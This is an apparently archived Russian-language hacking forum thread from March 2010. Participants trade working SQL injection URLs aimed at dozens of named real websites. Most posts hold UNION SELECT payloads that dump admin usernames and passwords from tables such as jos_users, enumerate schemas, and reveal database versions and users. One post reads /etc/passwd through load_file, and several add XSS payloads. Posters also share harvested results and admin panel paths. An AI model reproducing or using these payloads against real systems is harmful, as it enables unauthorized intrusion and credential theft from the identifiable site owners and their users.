http://www.web-standart.net/magaz.php?mid=1&rid=-8+union+select+1,2,group_concat(0x0b,login,0x3a,pa sswd)+from+users--
http://www.arpk.org/page.php?i=-2+union+select+group_concat%280x0b,table_name%29,2 ,3,4+from+information_schema.tables--
http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,group_concat(0x0b,NickNa me,0x3a,PassWd,0x3a,ICQ),3,4,5,6,7,8,9,10,11,12+fr om+fusers--
http://cwar.holdgold.ru/page.php?id=-7+union+select+1,2,group_concat(0x0b,TABLE_NAME),4 ,5+from+information_schema.tables--
http://www.mixcity.net/news/main.php?id=26&id_rub=-999999+union+select+group_concat%280x0b,table_name %29+from+information_schema.tables--&cpage=1
..::TROYAN::..
13.03.2010, 16:12
http://www.avosbillets.com/index.php?option=com_avosbillets&task=view&view=event&id=-463+union+select+1,concat%28username,0x3a,password %29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31+from+jos_users--
http://www.waw.lv/lv/component/gameserver/?view=gameserver&grp=-1%27+union+all+select+1,concat%28username,0x3A,pas sword%29,3,4,5,6,7+from+jos_users%23
http://www.nikgrey.com/component/gameserver/?view=gameserver&grp=-1%27+union+all+select+1,concat%28username,0x3A,pas sword%29,3,4,5,6,7+from+jos_users%23
http://www.archivesofrss.org/index.php?option=com_gurujibook&task=showPDF&bookid=-32+union+all+select+concat%28username,0x3a,passwor d%29,2,3,4+from+jos_users--
http://www.southwestnats.com/component/gameserver/?view=gameserver&grp=-1%27+union+all+select+1,concat%28username,0x3A,pas sword%29,3,4,5,6,7+from+jos_users%23
http://www.pagesunited.com/component/gameserver/?view=gameserver&grp=-1%27+union+all+select+1,concat%28username,0x3A,pas sword%29,3,4,5,6,7+from+jos_users%23
http://www.litkomtula.ru/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://www.radiocom.dn.ua/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://smeser.ru/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://chulakovka.com.ua/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://rastvor-beton.ru/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://www.m-protect.ru/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://idahogangs.com/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://www.hexgames.com/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://www.airballdesigner.com/EN/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://ombudsman.lgg.ru/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://www.heathlandsfc.co.uk/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://www.qerth.com/home/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://green-infrastructure-europe.org/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://www.warwickturfclub.org.au/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://www.heathlandsfc.co.uk/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://www.awf.de/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://koriaginn.zx6.ru/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://www.flevobike.nl/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://www.schenksa.ch/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://cms.heigermoser.name/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://www.phdbrasil.com.br/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://www.aeroclubuldrobeta.ro/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--
http://risen-piranhas.de/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://www.asadatec.de/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://www.vmgsm.ru/show_cat2.php?grid=-1+union+select+concat_ws(0x3a,user(),version())--
http://theancientsprings.de/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://www.microprice.fr/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://www.zweckverband-gdv.de/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--
http://www.dielinke-nds.de/orga/gs-nds/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://www.fnsa.com.ar/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://www.phdbrasil.com.br/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://www.qulleq.com/main/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://www.flevobike.nl/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://www.elaiolado.gr/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://www.escal49.fr/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://www.comeos.com/abdel/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://www.ccdck.ch/jomccdck/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://www.agmodena.it/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://www.multipermis.be/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://softproject.com.ua/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://www.cfase972.com/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://www.airballdesigner.com/FR/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://www.ecoletheologique-stcyprien.org/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://www.etalon1.ru/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat%28username,0x3a,password%29,4,5,6,7,8/**/from/**/jos_users--
http://www.opensourcelearning.info/portaal/index.php?option=com_lyftenbloggie&author=62+union+select+1,concat_ws%280x3a,username ,password%29,3,4,@@version,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+fr om+jos_users--
http://rudom.org/index.php?option=com_lyftenbloggie&author=62+union+select+1,concat_ws%280x3a,username ,password%29,3,4,@@version,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+fr om+jos_users--
http://www.sci-bono.co.za/home/index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,concat%28username,0x 3a,password%29,2,3,4+from+jos_users--
http://junkgirls.com/index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,concat%28username,0x 3a,password%29,2,3,4+from+jos_users--
http://www.jfpb.org/index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,concat%28username,0x 3a,password%29,2,3,4+from+jos_users--
http://www.vfw9907.org/index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,concat%28username,0x 3a,password%29,2,3,4+from+jos_users--
http://realitynow.org/grid/index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,concat%28username,0x 3a,password%29,2,3,4+from+jos_users--
http://swrfa.org/index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,concat%28username,0x 3a,password%29,2,3,4+from+jos_users--
http://www.irb.ch/index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,concat%28username,0x 3a,password%29,2,3,4+from+jos_users--
http://www.roswellnm.org/index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,concat%28username,0x 3a,password%29,2,3,4+from+jos_users--
http://www.sugartree.org/index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,concat%28username,0x 3a,password%29,2,3,4+from+jos_users--
http://www.swannysurfclub.org.au/index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,concat%28username,0x 3a,password%29,2,3,4+from+jos_users--
Strilo4ka
13.03.2010, 18:37
http://www.shansplus.com.ua/index.php?id=104+union+select+concat_ws(0x3a,g_id, g_userName,g_fullName,g_hashedPassword,g_email,g_l anguage,g_locked)+from+g2_User--+
http://www.koshkin-dom.ru/story.php?cid=5&lang=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,version(),1 3,14,15,16,17,18,19,20,21,22,23,24--+
..
http://www.datacd.ru/faq.php?id=-2+union+select+1,concat_ws(0x3a,username,password) ,3+from+main.usersadmin--
http://www.ecom-info.spb.ru/indicators/print.php?id=-428+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,ver sion(),%2015,16,17,18,19,20,21,22,23,24,25,26--
http://www.fondsk.ru/print.php?id=-2171+union+select+1,2,3,4,5,version(),7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30--
http://dom-garazh.ru/base.php?id=-17+union+select+1,2,3,concat_ws(0x3a,user_login,us er_pass)+from+girldays_allneft.wp_users--
http://dunfermline.info/diary/index?ID=1040&d=10&m=11&y=-2009'+union+select+concat_ws(0x3A,version(),user() ,database()), 2,3+--+
4.0.17-standard:sfl1_web159@localhost:sfl1_web159
Продюсерский центр «Пирамида»
в таблицах ничего нужного, но доступ есть.
http://pyramidfilm.ru/project.php?id=-44'+union+select+1,2,3,table_name,5,6,7+from+infor mation_schema.tables+where+table_schema=0x7A393130 31355F303031+limit+0,1--+
http://pyramidfilm.ru/project.php?id=-44'+union+select+1,2,3,concat_ws(0x3A,version(),us er(),database()),5,6,7+--+
5.0.32-Debian_7etch11-log:z91015_001@77.221.130.21:z91015_001
http://demo.xbtit.com//index.php?page=users&order=flag+or(1,1)=(select+count(0),concat((select +database()+from+btit_users+limit+0,1),floor(rand( 0)*2))from(information_schema.tables)group+by+2)--++&by=ASC
=\
sparcode
15.03.2010, 16:09
http://novitex.com.ua
http://novitex.com.ua/index.php?brandID=136%20union%20select%20@@version--
Офф сайт группы Би-2
http://www.bdva.ru/arhiv.phtml?id=146+and+1=0+union+select+1,2,3,4,5, 6,7,version(),9,10,11--
PR 4 Тиц 900
----------------------------------
PR 5
http://ebusiness.byu.edu/book_review.php?ID=19+and+1=0+union+select+1,2,3,v ersion%28%29,5,6,7,8,9,10--
Dr..VATSON
15.03.2010, 22:17
http://ebusiness.byu.edu/book_review.php?ID=-19+union+select+1,2,3,table_name,5,6,7,8,9,10+from +information_schema.tables+limit+76,1%20--
На основном домене
http://www.stanford.edu/group/spatialhistory/cgi-bin/site/pub.php?id=-23+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36--+
pr 9, тиц 4100
http://www.yickyak.com/news.php?catid=9%27+and+(select+1+from+(select+cou nt(0),concat((select+version()+from+debates+limit+ 1),floor(rand(0)*2))+from+debates+group+by+2+limit +1)a)+and+%27123%27=%27123
version: 4.1.22-max-log1
user: yydbmain@72.167.131.1571
database: yydbmain1
Red_EYEs
16.03.2010, 02:38
http://www.stanford.edu/group/spatialhistory/cgi-bin/site/pub.php?id=-23+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36--+
круто но вот там доступны только таблицы касающиеся раздела. Ничего интересного в них нет.
http://www.waterpump.com.ua/news.php?news_id=-61%20union%20select%201,2,3,VERSION(),USER(),6%20--
Assembler
16.03.2010, 02:38
http://www.met-con.com/index.php
http://www.met-con.com/about/showEmp.php?id=1-1%20union%20select%201,group_concat(table_name),3, 4,5,6,7,8%20from%20information_schema.tables--
5.0.89-community
PS: Вроде ниче интересного
______
http://www.tshome.com.tw/news-con.php?id=1-1%20union%20select%201,version(),3,4,5,6%20--
5.0.45-log
Китайцы сцук
____________
http://ocenshik.mostpp.ru/news.php?id=1-1%20union%20select%201,2,3,4,version(),6,7,8%20--
4.0.27
ТОП какой дебильный
______
http://www.belt-wrestling.org/en/news.php?id=1-1%20union%20select%201,2,3,4,5,6,7,version(),9%20--
4.1.22-standard
Сайт - ресслеров.. Надеюсь не побьют..
Таблиц не могу найти :(
________________
http://electromash.net/news.php?id=1&page=141-141%20union%20select%201,2,3,4,version(),6,7,8,9%2 0--
5.0.67-log
ОО кое чето поинтереснее =)
http://electromash.net/news.php?id=1&page=141-141%20union%20select%201,2,3,4,group_concat(column _name),6,7,8,9%20from%20information_schema.columns %20where%20table_name=0x61646d696e--
Отсюда узнаем колоночки (username,password) Хотя я и не сомневался =)
и Ну вобщем пароль нельзя выкладывать так что кому надо откопает сам http://electromash.net/news.php?id=1&page=141-141%20union%20select%201,2,3,4,concat_ws(0x3a,user name,password),6,7,8,9%20from%20admin--
_________________
http://www.sexshop24.ee/tm.php?id=1-1%20union%20select%20concat_ws(0x3a,ID,login,passw d)%20from%20ip_users%20--
5.0.67-log
Dr..VATSON
17.03.2010, 01:27
http://www.bilyardia.ru/zeus.catalog.phtml?idTowar=-41+union+select+1,2,user%28%29,4,version%28%29,6,7 ,8,9,10%20--
ТИЦ = 190
4.0.27-max-log
zeusspb9_shop@v12.valuehost.ru
Lam3rsha
17.03.2010, 03:20
http://www.cmb.su/index.php?nomer=58'+UNION+SELECT+1,2,3,4,CONCAT(0x 7873716C696E6A626567696E,Version(),0x2F2A2A2F,Data base(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),6 ,7,8,9,10+LIMIT+1, 1/*
Database Version: 5.0.45
User name: baltimed@localhost
http://www.dogshop.lv/index.php?part=3&part2=79+union+select+1,2,3,user(),5,6,7,8,9,10+li mit+1, 1/*
Database Version: 4.1.21-standard
User name: dogusr24@localhost
_http://ru-board.com
http://ru-board.com/new/article.php?sid=108+and+1=2+UNION+SELECT+1,2,3,con cat(database(),0x3a,user(),0x3a,version()),5,6,7,8 ,9,10+--+
phpnuke: phpnuke@localhost: 5.0.77
shell_c0de
17.03.2010, 15:48
_http://ru-board.com
http://ru-board.com/new/article.php?sid=108+and+1=2+UNION+SELECT+1,2,3,con cat(database(),0x3a,user(),0x3a,version()),5,6,7,8 ,9,10+--+
phpnuke: phpnuke@localhost: 5.0.77
это вроде уже боян хотя в другом скрипте скуля...
http://ru-board.com/new/search.php?author=-lynx%27+union+select+1,2,3,concat_ws%28%27.%27,tab le_schema,table_name,column_name%29,5,6,7,8,9,10+f rom+information_schema.columns+--+
Strilo4ka
18.03.2010, 00:10
http://www.labstend.ru/site/index/uch_tech/index_full.php?mode=full&id=161&id_cat=602+or(1,2)=(select+*+from(select+name_cons t(concat_ws(0x3a,version(),user(),database()),1),n ame_const(concat_ws(0x3a,version(),user(),database ()),1))a)--+5.0.45:labstend@localhost:rosuch_cms
Dr..VATSON
18.03.2010, 03:14
грузинский сайт
ТИЦ = 190
http://www.georgica.net/analitic/?page=ru&id=-303%27+union+select+1,2,3,4,5,6,7,8+--+
Strilo4ka
19.03.2010, 00:44
http://www.cellvision.com/index.php?menu_id=2+&node_id=50+and+0+union+select+1,2,3,4,users.*,1+fr om+users+limit+0,1/*
http://www.cellvision.com/index.php?menu_id=2+&node_id=50+and+0+union+select+1,2,3,4,1,users.*+fr om+users+limit+0,1/*
http://www.cellvision.com/index.php?menu_id=2+&node_id=50+and+0+union+select+1,2,3,users.*,1,1+fr om+users+limit+0,1/*
http://www.cellvision.com/index.php?menu_id=2+&node_id=50+and+0+union+select+1,2,users.*,1,1,1+fr om+users+limit+0,1/*© рибака
http://yume.cc.osaka-kyoiku.ac.jp/dream/files/bin.php?id=-4+union+select+1,2,3,concat_ws(0x3a,user(),version (),database()),5,6,7,8,9,10,11--
p_blog@localhost:4.1.21:p_blog
http://thedivinemercy.org/news/department.php?PLID=-72+union+select+1,version(),3,4,5/*
User: marianweb@mail.marian.org
Version:5.0.27-standard-log
Dbname:marianweb
http://www.hostnomi.com/detail.php?spid=-44+UNION+SELECT+1,2,3,concat_ws(0x3a,email,passwor d),5+from+users/*
мини хостинг. юзер - рут.версия -5.
CyberHunter
19.03.2010, 20:46
http://www.romanempiretours.com/stour.php?id=11+union+select+1,group_concat%28tabl e_name%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26+from+information_schema.t ables+--+
MySql 5.1
Dr..VATSON
19.03.2010, 21:51
ТИЦ = 10
5.0.22-Debian_0ubuntu6.06.12-log
http://www.ibis.dk/stoet/index.php?mode=readmenu&menuId=-23+union+select+1,group_concat%28column_name%29,3, 4,5,6+from+information_schema.columns+ where+table_name=char%28107,105,100,95,115,116,97, 102,102%29%20--
Из таблицы kid_staff
staff_id
username
password
usertype
firstname
middlename
lastname
gender
country
country_es
region
nationality
nationality_es
birthdate
lastmod
webstatus
rank
status
Dr..VATSON
20.03.2010, 04:10
http://jobmillion.com/en/member/detail-job.php?action=showlist&ID=-10+union+select+1,2,3,4,5,6,7,8,group_concat%28mil lion_system_staff_Password%29,group_concat%28milli on_system_staff_UserName%29,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35+from+million_system_staff%20--
Из таблицы million_system_staff
В Ы В О Д И Т С Я
million_system_staff_ID
million_system_staff_Name
million_system_staff_Email
million_system_staff_UserName
million_system_staff_Password
million_system_staff_CreateByID
million_system_staff_CreateBy
million_system_staff_CreateDate
million_system_staff_LastLoginDate
million_system_staff_Status
million_system_staff_Level
А Д М И Н К А
http://jobmillion.com/stats
http://www.infowomen.org/portfolio/clc/web_app/admin/job.php?job_id=-1+union+select+group_concat%28column_name%29+from+ information_schema.columns+where+table_name=char%2 8116,98,108,95,112,101,114,115,111,110,115%29%20--
Из таблицы tbl_persons
В Ы В О Д И Т С Я
person_id
first_name
last_name
client_id
job_id
email_address
password
y_n_recipient
А Д М И Н К А
http://www.infowomen.org/admin
ТИЦ = 10
5.1.26-rc
AVTOTYRE@localhost
http://www.avto-tyre.ru/shop.php?id=-27+union+select+1,2,group_concat%28column_name%29, 4,5,6,7,8,9,10,11,12,13,14,15+from+information_sch ema.columns+where+table_name=char%2897,100,100,114 ,101,115,115%29%20--
Из таблицы address
address_id
user_id
name
index
region
city
street
telephon
info
address_id
user_id
index
region
district
city
name
telephon
fax
street
house
building
stroenie
flat
entrance
floor
code
info
CyberHunter
20.03.2010, 19:40
http://www.brain-tumor.org/?id=-11+union+select+1,concat%28user%28%29,version%28%2 9,database%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19+--+
> btc_admin@localhost5.0.22btc
http://www.accessoriescoop.com/products.php?cid=49/**/and/**/1=2/**/union/**/select/**/1,version(),3,4/*
4.1.22-standard
Не смог подобрать названия таблиц, стыдно конечно (. Как можно заюзать такие скули? Help somebody
http://www.naregatsi.org/new/arm/events/up_events_details.php?event_id=1+and+1=0+union+sel ect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26,27,28
version() 5.1.45-log
user() naregats_tigran@localhost
database() naregats_naregatsi
+ XSS
http://www.naregatsi.org/new/arm/events/up_events_details.php?event_id=1+and+1=0+union+sel ect+1,2,3,4,5,<img src=http://forum.antichat.ru/antichat/pic/logo.gif width=500 hegth=800></img>,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28
http://surediamond.com/product.php?disproid=53+union+select+1,2,version() ,4,5--
можно ли както раскрутить дальше ? подскажите в пм , спс.
root_sashok
21.03.2010, 20:12
http://www.che-esche.com/fullafisha.php?id=-1+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11 ,12,13,14,15
http://thedivinemercy.org/news/department.php?PLID=-72+union+select+1,user(),version(),4,5/*
http://www.ktcomputer.de/start.php?kat=news&kat_id=-1+union+select+1,2,3,4,5,6,7,8,version(),user(),11 ,12,13,14,15,16,17--
Первые SQL-ы, практикуюсь :)
http://www.revues-plurielles.org/php/index.php?nav=revue&no=17+union+select+1,2,3,4,5
OS -Windows NT
user() revues-plu-admin@localhost
version() 5.0.21-community-nt
database() revues-plurielles
+ XSS
http://www.revues-plurielles.org/php/index.php?nav=revue&no="><script>alert('ANTICHAT')</script>
root_sashok
22.03.2010, 00:49
http://www.zeltarasa.com/?lang=ru&id=1+union+select+1,concat_ws(0x3a,user(),database (),version())+--
http://www.fotomundo.com/nota.php?id=-1+union+select+1,2,3,4,version(),user(),7,database (),9,10,11,12,13,14,15--
http://krasuis.ru/inset/foto.php?id=1+union+select+1,concat_ws(0x3a,user() ,database(),version()),3,4--
http://www.provisor.com.ua/news.php?art=-1+union+select+1,2,3,4,5,6,7,user(),version(),data base()--
http://www.boxclever.ca/news.php?id=-1+union+select+version(),2,user(),database(),5+--+
http://www.ekomtech.kiev.ua/a-news/news.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version()),5,6,7,8,9--
http://shepherdpost.christianpost.com/mainbox/news.php?cat=-1+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version()),5,6,7,8,9+--+
Здесь можно посмотреть таблицы: http://shepherdpost.christianpost.com/mainbox/news.php?cat=-1+union+select+1,2,3,table_name,5,6,7,8,9+from+inf ormation_schema.tables+--
http://dev.ultimareplenisher.com/news.php?id=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2--
http://www.kpbptpn.co.id/news.php?lang=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7,8,9,10,11,12,13--
http://views24hours.com/view24hours/news.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),datab ase(),version()),6,7,8,9--
Здесь вывод в самом низу, справа.
http://www.tagittins.co.uk/news.php?id=-1+union+select+1,user(),3,database(),5,6,7,8,9--
http://avto-tire.ru/item_view.php?id=&item_id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),datab ase(),version()),6,7,8,9,10,11,12,13,14,15,16,17+--+
Здесь 54 таблицы, последняя:
http://avto-tire.ru/item_view.php?id=&item_id=-1+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12 ,13,14,15,16,17+from+information_schema.tables+lim it+54,1--+
http://www.ctaholidays.net/beta/holiday_details.php?id=-1+union+select+1,2,3,4,5,6,7,user(),9,10,11,12,13, 14,database()--
http://www.ksds.edu/community/holidays.php?hid=40+order+by+6/*
User: scully@localhost
Version: 4.1.22-log
Dbname: scully
есть таблица мемберс
http://www.diffusion.ens.fr/index.php?res=themes&idtheme=30+and+1=0+union+select+1,2,3,concat(user, char(58),password),5,6+from+mysql.user--
OS - Debian GNU/Linux
user() : root@localhost
version() : 4.0.24_Debian-10sarge1-log
database() : ens_data
robots.txt:
User-agent: *
Disallow: /chbpascal/
Disallow: /college/video_college
Disallow: /college/photos
Disallow: /college/vignettes
Disallow: /college/en/video_college
Disallow: /college/en/photos
Disallow: /college/en/vignettes
Disallow: /en/audio
Disallow: /en/bonus
Disallow: /en/photos
Disallow: /en/video
Disallow: /en/video_stream
Disallow: /en/vignettes
Disallow: /pear
Disallow: /photos
Disallow: /administration
Disallow: /vignettes
Disallow: /college2
Disallow: /video
Disallow: /audio
Disallow: /video_stream
Disallow: /bonus
/etc/passwd
http://www.diffusion.ens.fr/index.php?res=themes&idtheme=30+and+1=0+union+select+1,2,3,load_file(CH AR(47,101,116,99,47,112,97,115,115,119,100)),5,6+f rom+mysql.user--
+XSS
http://www.diffusion.ens.fr/index.php?res=themes&idtheme=30+and+1=0+union+select+1,2,3,<img src=http://img525.imageshack.us/img525/7127/matrixic9.jpg></img>,5,6--
root_sashok
22.03.2010, 19:20
Здесь вывод в заголовке:
http://map64.ru/index.php?id=-1+union+select+user()--
Есть таблица users, она последняя:
http://map64.ru/index.php?id=-1+union+select+table_name+from+information_schema. tables+limit+23,1--
Админка:
http://www.map64.ru/job
dudu,edu
http://dotank.nyls.edu/projects/DDT/sys_index.pl?pid=0&iid=7&alt_id=45'+union+select+1,2,3,email,password,6+fro m+users/*&action=view_alternate
version:4
----------------------------------
http://muscle.hps.gatech.edu/protocol.pl?pid=14+union+select+version()+from+use r+limit+1,1--+&op=Show
вывод в тайтле
http://www.dynamicinst.net/news.php?id=21+union+select+1,2,3,4,concat(user,0x 3a,password)+from+login/*
и оно же
http://www.dynamicinst.net/news.php?id=21+union+select+1,2,3,4,concat_ws(0x3a ,user(),database(),version())/*
User: dynamicdb@localhost
Version: 5.0.27
Dbname: dynamic
root_sashok
22.03.2010, 21:42
http://www.conacyt.gov.py/admin/mostrar.php?noti=imagen&id=-1+union+select+1,concat_ws(0x3a,user(),database(), version())--
Username: web@localhost
Database: web
Version: 5.0.26
http://www.wyoptv.org/programming/viewprogram.php?id=1+union+select+1,user(),3,4,5,6 ,7,8,9,10,11,version(),database()/*
Username: wyoptv@localhost
Database: wyoptv
Version: 5.0.32-Debian_7etch6-log
http://www.2how.com/board/index.php?group=-1+union+select+1,2,3,4,version%28%29,6,7,8,9,10,11 ,12,13--
Username: root@localhost
Database: howhow_board
Version: 5.0.67-log
http://www.china-efe.org/article/article_show.php?article_id=-1+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version()),5,6,7,8,9,10,11,12,13,14,15,16--
Username: chinaedu@localhost
Database: chinaefe
Version: 5.1.11-beta-log
CyberHunter
22.03.2010, 22:57
http://lf-j.com/regi.php?id=-19+union+select+1,2,version%28%29,4,5,6,7,8,9+--+
Version: 5.0.89-community-log
User: lfjcom_user@localhost
Database: lfjcom_db
http://www.pitatel.com/pclass.php?id=-19+union+select+1,2,3,4,5,concat%28user%28%29,data base%28%29,version%28%29%29,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23+--+
Version: 4.0.22-standard 5
User: root@localhost
Database: mysql 5
ШкОлОтЭ ищет sql инъекции :rolleyes: :rolleyes: :rolleyes:
Target: http://www.turmanidze.ge/en/main.php?id=1223989248
Host IP: 212.72.131.186
Web Server: Apache/2.2.14 (FreeBSD) DAV/2
DB Server: MySQL >=5
Current User: turmanidze@localhost
Sql Version: 5.0.77
Current DB: turmanidze
System User: turmanidze@localhost
Host Name: webserver.sanet.ge
Installation dir: /usr/local/
DB User: 'turmanidze'@'localhost'
Data Bases: information_schema
test
turmanidze
http://www.turmanidze.ge/admin/
http://www.turmanidze.ge/phpmyadmin/
